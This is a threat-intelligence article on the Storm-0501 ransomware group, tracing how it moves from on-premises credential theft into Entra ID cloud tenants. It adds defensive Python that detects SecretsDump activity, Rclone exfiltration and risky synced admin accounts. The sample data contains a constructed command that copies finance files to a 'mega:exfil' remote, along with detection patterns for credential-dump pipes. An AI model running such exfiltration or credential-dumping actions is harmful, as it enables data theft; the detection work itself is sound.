Storm-0501 Threat Actor
The cybercriminal group tracked as Storm-0501 has focused its ransomware attacks on government, manufacturing, transportation, and law enforcement organizations in the United States. Its multi-stage campaigns target hybrid cloud environments, moving laterally from on-premises systems into the victim's cloud tenant. The outcome is credential theft, data exfiltration, tampering, persistent backdoor access to the cloud environment and, finally, ransomware deployment.
The Evolution of Storm-0501
Storm-0501 is financially motivated and relies on a mix of commercial and open-source tools to carry out its ransomware operations. Active since at least 2021, the group initially targeted educational institutions with the Sabbath (54bb47h) ransomware. It has since operated as an affiliate in several Ransomware-as-a-Service (RaaS) programs rather than running its own, deploying whichever payload its current partnership provides; strains attributed to the group include Hive, BlackCat (ALPHV), Hunters International, LockBit and, most recently, Embargo.
Initial Attack Vectors Utilized by Storm-0501
A defining characteristic of Storm-0501's operations is the exploitation of weak credentials and over-privileged accounts, which lets the group move from an organization's on-premises systems into its cloud environment on the strength of stolen credentials alone.
For initial access the group also leverages footholds established by access brokers such as Storm-0249 and Storm-0900, and exploits known remote code execution vulnerabilities in unpatched internet-facing servers, including Zoho ManageEngine, Citrix NetScaler and Adobe ColdFusion 2016.
Whichever entry point is used, Storm-0501 then performs extensive reconnaissance: identifying high-value assets, collecting domain information and enumerating Active Directory. This phase is typically followed by the installation of remote monitoring and management (RMM) tools to maintain access and persistence.
Exploitation of Privileges by Storm-0501
The threat actor used the local administrator privileges it held on the devices compromised during initial access to reach further into the network. Its primary tool was Impacket's SecretsDump module, which extracts credential material over the network (SAM account hashes, LSA secrets and cached domain credentials from a workstation or server and, against a domain controller, the contents of NTDS via the directory replication protocol); the group ran it across a large number of devices to gather login information.
The compromised credentials were then used to access additional devices and extract still more credentials. Along the way the actor read sensitive files to recover KeePass secrets and ran brute-force attacks against specific accounts.
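The SecretsDump sweep described above leaves a recognisable trail on the targets: the tool reaches each host over SMB, opens the svcctl and winreg named pipes on IPC$ to start RemoteRegistry and save the SAM, SECURITY and SYSTEM hives, and against a domain controller requests directory replication rights. The following Python is an added hunting example, not code from this page or from Microsoft. It runs two checks over constructed Windows Security events (5145 network share access and 4662 object access): one account touching the credential pipes on many hosts within a short window, and replication rights requested by an account that is neither a domain controller nor the Entra Connect sync account. The thresholds, field names, allowlist and sample events are the example's own assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Named pipes secretsdump opens over IPC$ when dumping a host remotely:
# svcctl to start RemoteRegistry, winreg to save the SAM/SECURITY/SYSTEM hives.
CREDENTIAL_PIPES = {"svcctl", "winreg"}

# Extended-right GUIDs that appear in Event 4662 when directory replication is
# requested (the path secretsdump uses against a domain controller).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}


def find_hive_dump_sweeps(events, min_hosts=5, window=timedelta(minutes=30)):
    """Return (account, host_count) for accounts that opened a credential pipe on
    IPC$ of at least min_hosts distinct hosts within any window of the given length."""
    touches = defaultdict(list)  # account -> [(time, computer)]
    for e in events:
        if e["EventID"] != 5145 or not e["ShareName"].upper().endswith("IPC$"):
            continue
        if e["RelativeTargetName"].lower() not in CREDENTIAL_PIPES:
            continue
        touches[e["Account"]].append((datetime.fromisoformat(e["Time"]), e["Computer"]))
    hits = []
    for account, items in touches.items():
        items.sort()
        best = 0
        for i, (t0, _) in enumerate(items):
            hosts = {c for t, c in items[i:] if t - t0 <= window}
            best = max(best, len(hosts))
        if best >= min_hosts:
            hits.append((account, best))
    return sorted(hits)


def find_unexpected_replication(events, allowed_accounts):
    """Return (account, computer) for 4662 events requesting replication rights
    from an account outside the allowlist (DC machine accounts, sync account)."""
    allowed = {a.upper() for a in allowed_accounts}
    hits = set()
    for e in events:
        if e["EventID"] != 4662:
            continue
        props = {p.strip("{}").lower() for p in e.get("Properties", [])}
        if props & REPLICATION_RIGHTS and e["Account"].upper() not in allowed:
            hits.add((e["Account"], e["Computer"]))
    return sorted(hits)


def _ev(eid, time, account, computer, **extra):
    return {"EventID": eid, "Time": time, "Account": account, "Computer": computer, **extra}


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    # one account opening winreg/svcctl over IPC$ on six hosts within ten minutes
    *[_ev(5145, f"2024-09-20T10:0{i}:00", "CORP\\svc_backup", f"WS{i:02d}",
          ShareName="\\\\*\\IPC$", RelativeTargetName="winreg") for i in range(6)],
    _ev(5145, "2024-09-20T10:03:30", "CORP\\svc_backup", "WS03",
        ShareName="\\\\*\\IPC$", RelativeTargetName="svcctl"),
    # a help-desk admin touching a single host (below threshold)
    _ev(5145, "2024-09-20T11:00:00", "CORP\\helpdesk", "WS20",
        ShareName="\\\\*\\IPC$", RelativeTargetName="winreg"),
    # ordinary file share access, not a credential pipe
    _ev(5145, "2024-09-20T11:05:00", "CORP\\svc_backup", "FS01",
        ShareName="\\\\*\\Data", RelativeTargetName="reports\\q3.xlsx"),
    # 4662 on the DC: legitimate replication by another DC and by the Entra
    # Connect sync account, then the same rights requested by a user account
    _ev(4662, "2024-09-20T10:10:00", "DC02$", "DC01",
        Properties=["{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"]),
    _ev(4662, "2024-09-20T10:12:00", "MSOL_1a2b3c4d5e6f", "DC01",
        Properties=["{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"]),
    _ev(4662, "2024-09-20T10:15:00", "CORP\\jdoe", "DC01",
        Properties=["{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}",
                    "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"]),
]

# Accounts expected to replicate: DC machine accounts and the Entra Connect account.
ALLOWED_REPLICATORS = {"DC01$", "DC02$", "MSOL_1a2b3c4d5e6f"}

if __name__ == "__main__":
    print("hive-dump sweeps:", find_hive_dump_sweeps(SAMPLE_EVENTS))
    print("replication outside allowlist:",
          find_unexpected_replication(SAMPLE_EVENTS, ALLOWED_REPLICATORS))
```

The allowlist is the part that needs care: Entra Connect with password hash sync legitimately replicates password data with its MSOL_* account, so that account must be excluded from the replication check, but the same account appearing from a host other than the Connect server is itself worth a separate alert.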
Lateral Movement and Data Exfiltration
Researchers observed Storm-0501 using Cobalt Strike for lateral movement, executing follow-on commands with the stolen credentials. For exfiltration from the on-premises environment the group used Rclone to copy sensitive data to the MegaSync public cloud storage service.
The threat actor has also been noted for establishing persistent backdoor access to cloud environments while deploying ransomware on on-premises systems. This makes Storm-0501 the latest actor to target hybrid cloud environments, following groups such as Octo Tempest and Manatee Tempest.
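Because Rclone is a legitimate, signed tool, matching on the file name alone is weak, and operators routinely rename the binary. The added Python below (an example, not code from this page or from Microsoft) classifies constructed Sysmon-style process-creation records by three indicators: an OriginalFileName of rclone.exe launched under a different image name, a transfer verb (copy, sync, move) whose destination uses rclone's remote:path syntax, and an explicit --config file. The sample records and the list of verbs are constructed for the example.

```python
import ntpath
import shlex

RCLONE_ORIGINAL_NAME = "rclone.exe"
# rclone subcommands that move data off the host
TRANSFER_VERBS = {"copy", "sync", "move", "copyto", "moveto"}


def _is_remote(token):
    """rclone addresses a configured backend as name:path. A Windows drive letter
    (C:\\...) has a one-character prefix and a URL has '//' after the colon."""
    name, sep, rest = token.partition(":")
    return bool(sep) and len(name) > 1 and not rest.startswith("//")


def classify_process(event):
    """Return the indicators that make this process-creation record look like an
    Rclone transfer; an empty list means nothing matched."""
    reasons = []
    image = ntpath.basename(event["Image"]).lower()
    original = event.get("OriginalFileName", "").lower()
    if original == RCLONE_ORIGINAL_NAME and image != RCLONE_ORIGINAL_NAME:
        reasons.append(f"binary renamed: OriginalFileName {original} launched as {image}")
    try:
        argv = shlex.split(event["CommandLine"], posix=False)
    except ValueError:  # unbalanced quotes: fall back to a plain whitespace split
        argv = event["CommandLine"].split()
    args = [a.strip('"') for a in argv[1:]]
    verbs = [a for a in args if a.lower() in TRANSFER_VERBS]
    remotes = [a for a in args if _is_remote(a)]
    if verbs and remotes:
        reasons.append(f"transfer verb '{verbs[0]}' with remote target '{remotes[0]}'")
    if "--config" in args:
        idx = args.index("--config")
        if idx + 1 < len(args):
            reasons.append(f"explicit config file {args[idx + 1]}")
    return reasons


def find_rclone_transfers(events):
    """Return (Image, reasons) for every record with at least one indicator."""
    return [(e["Image"], classify_process(e)) for e in events if classify_process(e)]


# Constructed Sysmon Event 1 style records (not real telemetry).
SAMPLE_PROCESSES = [
    {"Image": r"C:\Windows\Temp\svhost.exe", "OriginalFileName": "rclone.exe",
     "CommandLine": r"C:\Windows\Temp\svhost.exe copy C:\Finance\ mega:exfil "
                    r"--transfers 8 -P --config C:\Windows\Temp\r.conf"},
    {"Image": r"C:\Program Files\rclone\rclone.exe", "OriginalFileName": "rclone.exe",
     "CommandLine": r'"C:\Program Files\rclone\rclone.exe" sync D:\Backups\ '
                    r"backup-s3:corp-backups --transfers 16"},
    {"Image": r"C:\Windows\System32\svchost.exe", "OriginalFileName": "svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p"},
    {"Image": r"C:\Windows\System32\xcopy.exe", "OriginalFileName": "XCOPY.EXE",
     "CommandLine": r"xcopy C:\data D:\data /E"},
]

if __name__ == "__main__":
    for image, reasons in find_rclone_transfers(SAMPLE_PROCESSES):
        print(image)
        for r in reasons:
            print("   ", r)
```

The second sample record, an unrenamed rclone.exe syncing to a backup bucket, is flagged as well; that is deliberate, since a transfer to any remote is the behaviour of interest, and known backup jobs should be allowlisted by image path and destination rather than by suppressing the rule.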
Targeting the Cloud
The threat actor used harvested credentials, specifically Microsoft Entra ID (formerly Azure AD) credentials, to pivot from the on-premises environment into the cloud and to establish a persistent backdoor there.
The pivot into the cloud was achieved in one of two ways: through a compromised Microsoft Entra Connect Sync account (the Directory Synchronization account, whose credentials are stored on the Entra Connect server and which is permitted to change the passwords of synced users), or by taking over an on-premises user whose corresponding cloud account holds administrative privileges and is not protected by multi-factor authentication (MFA), then hijacking that account's cloud session. In both cases the weakness is the trust between the on-premises directory and the tenant: a privileged cloud identity that shares credentials with, or can be reset from, on-premises inherits every on-premises compromise.
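Two controls follow directly from the two pivots above. The added Python below (an example, not code from this page or from Microsoft) takes constructed sign-in and user/role data shaped loosely like Microsoft Graph output and flags, first, sign-ins by the Entra Connect Directory Synchronization account (UPN pattern Sync_<server>_<id>@<tenant>.onmicrosoft.com, assumed here) from any address other than the Connect server's, and second, accounts synced from on-premises that hold a privileged directory role without a registered MFA method. The role list, field names and sample data are the example's own assumptions.

```python
import ipaddress
import re

# UPN shape of the Directory Synchronization account Entra Connect Sync creates
# (Sync_<server>_<id>@<tenant>.onmicrosoft.com); assumed for this example.
SYNC_ACCOUNT_RE = re.compile(r"^sync_[^_@]+_[0-9a-f]+@", re.IGNORECASE)

# Directory roles treated as privileged for the audit (the example's own list).
PRIVILEGED_ROLES = {
    "Global Administrator",
    "Privileged Role Administrator",
    "Hybrid Identity Administrator",
    "Application Administrator",
}


def sync_account_signins_off_server(signins, connect_server_nets):
    """Flag sign-ins by the sync account that did not come from the Entra
    Connect server's known address range(s). Returns (upn, ip, time) tuples."""
    nets = [ipaddress.ip_network(n) for n in connect_server_nets]
    hits = []
    for s in signins:
        if not SYNC_ACCOUNT_RE.match(s["userPrincipalName"]):
            continue
        ip = ipaddress.ip_address(s["ipAddress"])
        if not any(ip in net for net in nets):
            hits.append((s["userPrincipalName"], s["ipAddress"], s["createdDateTime"]))
    return hits


def synced_admins_without_mfa(users, role_members):
    """Return UPNs of accounts synced from on-premises that hold a privileged
    directory role and have no MFA method registered: exactly the accounts an
    on-premises compromise can ride into the tenant."""
    privileged = {upn for role, members in role_members.items()
                  if role in PRIVILEGED_ROLES for upn in members}
    return sorted(
        u["userPrincipalName"] for u in users
        if u["onPremisesSyncEnabled"]
        and u["userPrincipalName"] in privileged
        and not u["mfaRegistered"]
    )


# Constructed sample data (not real tenant output).
SIGNINS = [
    {"userPrincipalName": "Sync_AADC01_7f3e9a2b1c4d@contoso.onmicrosoft.com",
     "ipAddress": "10.20.0.15", "createdDateTime": "2024-09-20T09:58:00Z"},
    {"userPrincipalName": "Sync_AADC01_7f3e9a2b1c4d@contoso.onmicrosoft.com",
     "ipAddress": "198.51.100.23", "createdDateTime": "2024-09-20T10:31:00Z"},
    {"userPrincipalName": "jdoe@contoso.com",
     "ipAddress": "198.51.100.23", "createdDateTime": "2024-09-20T10:32:00Z"},
]
CONNECT_SERVER_NETS = ["10.20.0.15/32"]  # the Entra Connect server's egress address

USERS = [
    {"userPrincipalName": "jdoe@contoso.com", "onPremisesSyncEnabled": True, "mfaRegistered": False},
    {"userPrincipalName": "admin-jdoe@contoso.com", "onPremisesSyncEnabled": True, "mfaRegistered": False},
    {"userPrincipalName": "cloudadmin@contoso.onmicrosoft.com", "onPremisesSyncEnabled": False, "mfaRegistered": True},
    {"userPrincipalName": "itops@contoso.com", "onPremisesSyncEnabled": True, "mfaRegistered": True},
]
ROLE_MEMBERS = {
    "Global Administrator": ["admin-jdoe@contoso.com", "cloudadmin@contoso.onmicrosoft.com"],
    "Hybrid Identity Administrator": ["itops@contoso.com"],
    "Reports Reader": ["jdoe@contoso.com"],
}

if __name__ == "__main__":
    print("sync account used off the Connect server:",
          sync_account_signins_off_server(SIGNINS, CONNECT_SERVER_NETS))
    print("synced privileged accounts without MFA:",
          synced_admins_without_mfa(USERS, ROLE_MEMBERS))
```

The second check is the preventive one: a privileged cloud role should live on a cloud-only account with MFA enforced, so the expected output of that audit in a well-configured tenant is an empty list, and any entry is a ready-made path from the on-premises domain into the tenant.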
Deployment of the Embargo Ransomware
Once the threat actor has secured sufficient control over the network and exfiltrated the files of interest, the attack culminates in the deployment of Embargo ransomware across the victim organization. Embargo, a Rust-based ransomware, was first identified in May 2024.
The group behind Embargo runs it as a Ransomware-as-a-Service (RaaS) operation, supplying the payload and infrastructure to affiliates such as Storm-0501 in exchange for a share of the ransom. Embargo affiliates use double extortion: they encrypt the victim's files and simultaneously threaten to publish the harvested data unless the ransom is paid.